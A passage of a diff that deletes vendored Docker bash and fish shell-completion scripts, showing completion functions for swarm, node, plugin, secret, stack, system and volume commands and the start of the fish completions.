-			else
-				if [ $cword -eq $counter ]; then
-					__docker_complete_images
-				fi
-			fi
-			;;
-	esac
-}
-
-_docker_swarm() {
-	local subcommands="
-		init
-		join
-		join-token
-		leave
-		unlock
-		unlock-key
-		update
-	"
-	__docker_subcommands "$subcommands" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_swarm_init() {
-	case "$prev" in
-		--advertise-addr)
-			if [[ $cur == *: ]] ; then
-				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
-			else
-				__docker_complete_local_interfaces
-				__docker_nospace
-			fi
-			return
-			;;
-		--availability)
-			COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) )
-			return
-			;;
-		--cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit)
-			return
-			;;
-		--listen-addr)
-			if [[ $cur == *: ]] ; then
-				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
-			else
-				__docker_complete_local_interfaces --add 0.0.0.0
-				__docker_nospace
-			fi
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--advertise-addr --autolock --availability --cert-expiry --dispatcher-heartbeat --external-ca --force-new-cluster --help --listen-addr --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_swarm_join() {
-	case "$prev" in
-		--advertise-addr)
-			if [[ $cur == *: ]] ; then
-				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
-			else
-				__docker_complete_local_interfaces
-				__docker_nospace
-			fi
-			return
-			;;
-		--listen-addr)
-			if [[ $cur == *: ]] ; then
-				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
-			else
-				__docker_complete_local_interfaces --add 0.0.0.0
-				__docker_nospace
-			fi
-			return
-			;;
-		--token)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--advertise-addr --help --listen-addr --token" -- "$cur" ) )
-			;;
-		*:)
-			COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
-			;;
-	esac
-}
-
-_docker_swarm_join-token() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) )
-			;;
-		*)
-			local counter=$( __docker_pos_first_nonflag )
-			if [ $cword -eq $counter ]; then
-				COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) )
-			fi
-			;;
-	esac
-}
-
-_docker_swarm_leave() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_swarm_unlock() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_swarm_unlock-key() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_swarm_update() {
-	case "$prev" in
-		--cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--autolock --cert-expiry --dispatcher-heartbeat --external-ca --help --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_node() {
-	local subcommands="
-		demote
-		inspect
-		ls list
-		promote
-		rm remove
-		ps
-		update
-	"
-	__docker_subcommands "$subcommands" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_node_demote() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_nodes --filter role=manager
-	esac
-}
-
-_docker_node_inspect() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_nodes_plus_self
-	esac
-}
-
-_docker_node_list() {
-	_docker_node_ls
-}
-
-_docker_node_ls() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		id)
-			__docker_complete_nodes --cur "${cur##*=}" --id
-			return
-			;;
-		name)
-			__docker_complete_nodes --cur "${cur##*=}" --name
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_node_promote() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_nodes --filter role=worker
-	esac
-}
-
-_docker_node_remove() {
-	_docker_node_rm
-}
-
-_docker_node_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_nodes
-	esac
-}
-
-_docker_node_ps() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		desired-state)
-			COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) )
-			return
-			;;
-		name)
-			__docker_complete_services --cur "${cur##*=}" --name
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -W "desired-state id label name" -S = -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_nodes_plus_self
-			;;
-	esac
-}
-
-_docker_node_update() {
-	case "$prev" in
-		--availability)
-			COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) )
-			return
-			;;
-		--role)
-			COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) )
-			return
-			;;
-		--label-add|--label-rm)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--availability --help --label-add --label-rm --role" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_nodes
-	esac
-}
-
-_docker_pause() {
-	_docker_container_pause
-}
-
-_docker_plugin() {
-	local subcommands="
-		create
-		disable
-		enable
-		inspect
-		install
-		ls
-		push
-		rm
-		set
-	"
-	local aliases="
-		list
-		remove
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_plugin_create() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--compress --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				# reponame
-				return
-			elif [ $cword -eq  $((counter + 1)) ]; then
-				_filedir -d
-			fi
-			;;
-	esac
-}
-
-_docker_plugin_disable() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_plugins_installed
-			fi
-			;;
-	esac
-}
-
-_docker_plugin_enable() {
-	case "$prev" in
-		--timeout)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --timeout" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--timeout')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_plugins_installed
-			fi
-			;;
-	esac
-}
-
-_docker_plugin_inspect() {
-	case "$prev" in
-		--format|f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_plugins_installed
-			;;
-	esac
-}
-
-_docker_plugin_install() {
-	case "$prev" in
-		--alias)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--alias --disable --disable-content-trust=false --grant-all-permissions --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_plugin_list() {
-	_docker_plugin_ls
-}
-
-_docker_plugin_ls() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --no-trunc" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_plugin_push() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_plugins_installed
-			fi
-			;;
-	esac
-}
-
-_docker_plugin_remove() {
-	_docker_plugin_rm
-}
-
-_docker_plugin_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_plugins_installed
-			;;
-	esac
-}
-
-_docker_plugin_set() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_plugins_installed
-			fi
-			;;
-	esac
-}
-
-
-_docker_port() {
-	_docker_container_port
-}
-
-_docker_ps() {
-	_docker_container_ls
-}
-
-_docker_pull() {
-	_docker_image_pull
-}
-
-_docker_push() {
-	_docker_image_push
-}
-
-_docker_rename() {
-	_docker_container_rename
-}
-
-_docker_restart() {
-	_docker_container_restart
-}
-
-_docker_rm() {
-	_docker_container_rm
-}
-
-_docker_rmi() {
-	_docker_image_rm
-}
-
-_docker_run() {
-	_docker_container_run
-}
-
-_docker_save() {
-	_docker_image_save
-}
-
-
-_docker_secret() {
-	local subcommands="
-		create
-		inspect
-		ls
-		rm
-	"
-	local aliases="
-		list
-		remove
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_secret_create() {
-	case "$prev" in
-		--label|-l)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --label -l" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_secret_inspect() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_secrets
-			;;
-	esac
-}
-
-_docker_secret_list() {
-	_docker_secret_ls
-}
-
-_docker_secret_ls() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --quiet -q" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_secret_remove() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_secrets
-			;;
-	esac
-}
-
-_docker_secret_rm() {
-	_docker_secret_remove
-}
-
-
-
-_docker_search() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		is-automated)
-			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
-			return
-			;;
-		is-official)
-			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "is-automated is-official stars" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--limit)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter --help --limit --no-trunc" -- "$cur" ) )
-			;;
-	esac
-}
-
-
-_docker_stack() {
-	local subcommands="
-		deploy
-		ls
-		ps
-		rm
-		services
-	"
-	local aliases="
-		down
-		list
-		remove
-		up
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_stack_deploy() {
-	case "$prev" in
-		--bundle-file)
-			if __docker_is_experimental ; then
-				_filedir dab
-				return
-			fi
-			;;
-		--compose-file|-c)
-			_filedir yml
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			local options="--compose-file -c --help --with-registry-auth"
-			__docker_is_experimental && options+=" --bundle-file"
-			COMPREPLY=( $( compgen -W "$options" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_stack_down() {
-	_docker_stack_rm
-}
-
-_docker_stack_list() {
-	_docker_stack_ls
-}
-
-_docker_stack_ls() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_stack_ps() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		desired-state)
-			COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) )
-			return
-			;;
-		id)
-			__docker_complete_stacks --cur "${cur##*=}" --id
-			return
-			;;
-		name)
-			__docker_complete_stacks --cur "${cur##*=}" --name
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "id name desired-state" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all -a --filter -f --help --no-resolve --no-trunc" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--filter|-f')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_stacks
-			fi
-			;;
-	esac
-}
-
-_docker_stack_remove() {
-	_docker_stack_rm
-}
-
-_docker_stack_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_stacks
-			fi
-			;;
-	esac
-}
-
-_docker_stack_services() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		id)
-			__docker_complete_services --cur "${cur##*=}" --id
-			return
-			;;
-		label)
-			return
-			;;
-		name)
-			__docker_complete_services --cur "${cur##*=}" --name
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "id label name" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--filter|-f')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_stacks
-			fi
-			;;
-	esac
-}
-
-_docker_stack_up() {
-	_docker_stack_deploy
-}
-
-
-_docker_start() {
-	_docker_container_start
-}
-
-_docker_stats() {
-	_docker_container_stats
-}
-
-_docker_stop() {
-	_docker_container_stop
-}
-
-
-_docker_system() {
-	local subcommands="
-		df
-		events
-		info
-		prune
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_system_df() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --verbose -v" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_system_events() {
-	local key=$(__docker_map_key_of_current_option '-f|--filter')
-	case "$key" in
-		container)
-			__docker_complete_containers_all --cur "${cur##*=}"
-			return
-			;;
-		daemon)
-			local name=$(__docker_q info | sed -n 's/^\(ID\|Name\): //p')
-			COMPREPLY=( $( compgen -W "$name" -- "${cur##*=}" ) )
-			return
-			;;
-		event)
-			COMPREPLY=( $( compgen -W "
-				attach
-				commit
-				connect
-				copy
-				create
-				delete
-				destroy
-				detach
-				die
-				disconnect
-				exec_create
-				exec_detach
-				exec_start
-				export
-				health_status
-				import
-				kill
-				load
-				mount
-				oom
-				pause
-				pull
-				push
-				reload
-				rename
-				resize
-				restart
-				save
-				start
-				stop
-				tag
-				top
-				unmount
-				unpause
-				untag
-				update
-			" -- "${cur##*=}" ) )
-			return
-			;;
-		image)
-			cur="${cur##*=}"
-			__docker_complete_images
-			return
-			;;
-		network)
-			__docker_complete_networks --cur "${cur##*=}"
-			return
-			;;
-		type)
-			COMPREPLY=( $( compgen -W "container daemon image network volume" -- "${cur##*=}" ) )
-			return
-			;;
-		volume)
-			__docker_complete_volumes --cur "${cur##*=}"
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "container daemon event image label network type volume" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--since|--until)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --help --since --until --format" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_system_info() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_system_prune() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-
-_docker_tag() {
-	_docker_image_tag
-}
-
-_docker_unpause() {
-	_docker_container_unpause
-}
-
-_docker_update() {
-	_docker_container_update
-}
-
-_docker_top() {
-	_docker_container_top
-}
-
-_docker_version() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_volume_create() {
-	case "$prev" in
-		--driver|-d)
-			__docker_complete_plugins_bundled --type Volume
-			return
-			;;
-		--label|--opt|-o)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--driver -d --help --label --opt -o" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_volume_inspect() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_volumes
-			;;
-	esac
-}
-
-_docker_volume_ls() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		dangling)
-			COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) )
-			return
-			;;
-		driver)
-			__docker_complete_plugins_bundled --cur "${cur##*=}" --type Volume
-			return
-			;;
-		name)
-			__docker_complete_volumes --cur "${cur##*=}"
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "dangling driver label name" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--format)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --format --help --quiet -q" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_volume_prune() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_volume_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_volumes
-			;;
-	esac
-}
-
-_docker_volume() {
-	local subcommands="
-		create
-		inspect
-		ls
-		prune
-		rm
-	"
-	__docker_subcommands "$subcommands" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_wait() {
-	_docker_container_wait
-}
-
-_docker() {
-	local previous_extglob_setting=$(shopt -p extglob)
-	shopt -s extglob
-
-	local management_commands=(
-		container
-		image
-		network
-		node
-		plugin
-		secret
-		service
-		stack
-		system
-		volume
-	)
-
-	local top_level_commands=(
-		build
-		login
-		logout
-		run
-		search
-		version
-	)
-
-	local legacy_commands=(
-		commit
-		cp
-		create
-		diff
-		events
-		exec
-		export
-		history
-		images
-		import
-		info
-		inspect
-		kill
-		load
-		logs
-		pause
-		port
-		ps
-		pull
-		push
-		rename
-		restart
-		rm
-		rmi
-		save
-		start
-		stats
-		stop
-		swarm
-		tag
-		top
-		unpause
-		update
-		wait
-	)
-
-	local experimental_commands=(
-		checkpoint
-		deploy
-	)
-
-	local commands=(${management_commands[*]} ${top_level_commands[*]})
-	[ -z "$DOCKER_HIDE_LEGACY_COMMANDS" ] && commands+=(${legacy_commands[*]})
-
-	# These options are valid as global options for all client commands
-	# and valid as command options for `docker daemon`
-	local global_boolean_options="
-		--debug -D
-		--tls
-		--tlsverify
-	"
-	local global_options_with_args="
-		--config
-		--host -H
-		--log-level -l
-		--tlscacert
-		--tlscert
-		--tlskey
-	"
-
-	local host config
-
-	COMPREPLY=()
-	local cur prev words cword
-	_get_comp_words_by_ref -n : cur prev words cword
-
-	local command='docker' command_pos=0 subcommand_pos
-	local counter=1
-	while [ $counter -lt $cword ]; do
-		case "${words[$counter]}" in
-			# save host so that completion can use custom daemon
-			--host|-H)
-				(( counter++ ))
-				host="${words[$counter]}"
-				;;
-			# save config so that completion can use custom configuration directories
-			--config)
-				(( counter++ ))
-				config="${words[$counter]}"
-				;;
-			$(__docker_to_extglob "$global_options_with_args") )
-				(( counter++ ))
-				;;
-			-*)
-				;;
-			=)
-				(( counter++ ))
-				;;
-			*)
-				command="${words[$counter]}"
-				command_pos=$counter
-				break
-				;;
-		esac
-		(( counter++ ))
-	done
-
-	local binary="${words[0]}"
-	if [[ $binary == ?(*/)dockerd ]] ; then
-		# for the dockerd binary, we reuse completion of `docker daemon`.
-		# dockerd does not have subcommands and global options.
-		command=daemon
-		command_pos=0
-	fi
-
-	local completions_func=_docker_${command}
-	declare -F $completions_func >/dev/null && $completions_func
-
-	eval "$previous_extglob_setting"
-	return 0
-}
-
-eval "$__docker_previous_extglob_setting"
-unset __docker_previous_extglob_setting
-
-complete -F _docker docker dockerd
diff --git a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish
deleted file mode 100644
index 2715cb1aa6..0000000000
--- a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish
+++ /dev/null
@@ -1,405 +0,0 @@
-# docker.fish - docker completions for fish shell
-#
-# This file is generated by gen_docker_fish_completions.py from:
-# https://github.com/barnybug/docker-fish-completion
-#
-# To install the completions:
-# mkdir -p ~/.config/fish/completions
-# cp docker.fish ~/.config/fish/completions
-#
-# Completion supported:
-# - parameters
-# - commands
-# - containers
-# - images
-# - repositories
-
-function __fish_docker_no_subcommand --description 'Test if docker has yet to be given the subcommand'
-    for i in (commandline -opc)
-        if contains -- $i attach build commit cp create diff events exec export history images import info inspect kill load login logout logs pause port ps pull push rename restart rm rmi run save search start stop tag top unpause version wait stats
-            return 1
-        end
-    end
-    return 0
-end
-
-function __fish_print_docker_containers --description 'Print a list of docker containers' -a select
-    switch $select
-        case running
-            docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS="  +"}; $5 ~ "^Up" {print $1 "\n" $(NF)}' | tr ',' '\n'
-        case stopped
-            docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS="  +"}; $5 ~ "^Exit" {print $1 "\n" $(NF)}' | tr ',' '\n'
-        case all
-            docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS="  +"}; {print $1 "\n" $(NF)}' | tr ',' '\n'
-    end
-end
-
-function __fish_print_docker_images --description 'Print a list of docker images'
-    docker images | command awk 'NR>1' | command grep -v '<none>' | command awk '{print $1":"$2}'
-end
-
-function __fish_print_docker_repositories --description 'Print a list of docker repositories'
-    docker images | command awk 'NR>1' | command grep -v '<none>' | command awk '{print $1}' | command sort | command uniq
-end
-
-# common options
-complete -c docker -f -n '__fish_docker_no_subcommand' -l api-cors-header -d "Set CORS headers in the Engine API. Default is cors disabled"
-complete -c docker -f -n '__fish_docker_no_subcommand' -s b -l bridge -d 'Attach containers to a pre-existing network bridge'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l bip -d "Use this CIDR notation address for the network bridge's IP, not compatible with -b"
-complete -c docker -f -n '__fish_docker_no_subcommand' -s D -l debug -d 'Enable debug mode'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s d -l daemon -d 'Enable daemon mode'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l dns -d 'Force Docker to use specific DNS servers'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-opt -d 'Force Docker to use specific DNS options'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-search -d 'Force Docker to use specific DNS search domains'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l exec-opt -d 'Set runtime execution options'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr -d 'IPv4 subnet for fixed IPs (e.g. 10.20.0.0/16)'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr-v6 -d 'IPv6 subnet for fixed IPs (e.g.: 2001:a02b/48)'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s G -l group -d 'Group to assign the unix socket specified by -H when running in daemon mode'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s g -l graph -d 'Path to use as the root of the Docker runtime'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s H -l host -d 'The socket(s) to bind to in daemon mode or connect to in client mode, specified using one or more tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s h -l help -d 'Print usage'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l icc -d 'Allow unrestricted inter-container and Docker daemon host communication'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l insecure-registry -d 'Enable insecure communication with specified registries (no certificate verification for HTTPS and enable HTTP fallback) (e.g., localhost:5000 or 10.20.0.0/16)'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l ip -d 'Default IP address to use when binding container ports'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-forward -d 'Enable net.ipv4.ip_forward and IPv6 forwarding if --fixed-cidr-v6 is defined. IPv6 forwarding may interfere with your existing IPv6 configuration when using Router Advertisement.'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-masq -d "Enable IP masquerading for bridge's IP range"
-complete -c docker -f -n '__fish_docker_no_subcommand' -l iptables -d "Enable Docker's addition of iptables rules"
-complete -c docker -f -n '__fish_docker_no_subcommand' -l ipv6 -d 'Enable IPv6 networking'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s l -l log-level -d 'Set the logging level ("debug", "info", "warn", "error", "fatal")'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l label -d 'Set key=value labels to the daemon (displayed in `docker info`)'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l mtu -d 'Set the containers network MTU'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s p -l pidfile -d 'Path to use for daemon PID file'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l registry-mirror -d 'Specify a preferred Docker registry mirror'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s s -l storage-driver -d 'Force the Docker runtime to use a specific storage driver'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l selinux-enabled -d 'Enable selinux support. SELinux does not presently support the BTRFS storage driver'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l storage-opt -d 'Set storage driver options'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l tls -d 'Use TLS; implied by --tlsverify'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscacert -d 'Trust only remotes providing a certificate signed by the CA given here'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscert -d 'Path to TLS certificate file'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l tlskey -d 'Path to TLS key file'
-complete -c docker -f -n '__fish_docker_no_subcommand' -l tlsverify -d 'Use TLS and verify the remote (daemon: verify client, client: verify daemon)'
-complete -c docker -f -n '__fish_docker_no_subcommand' -s v -l version -d 'Print version information and quit'
-
-# subcommands
-# attach
-complete -c docker -f -n '__fish_docker_no_subcommand' -a attach -d 'Attach to a running container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l no-stdin -d 'Do not attach STDIN'
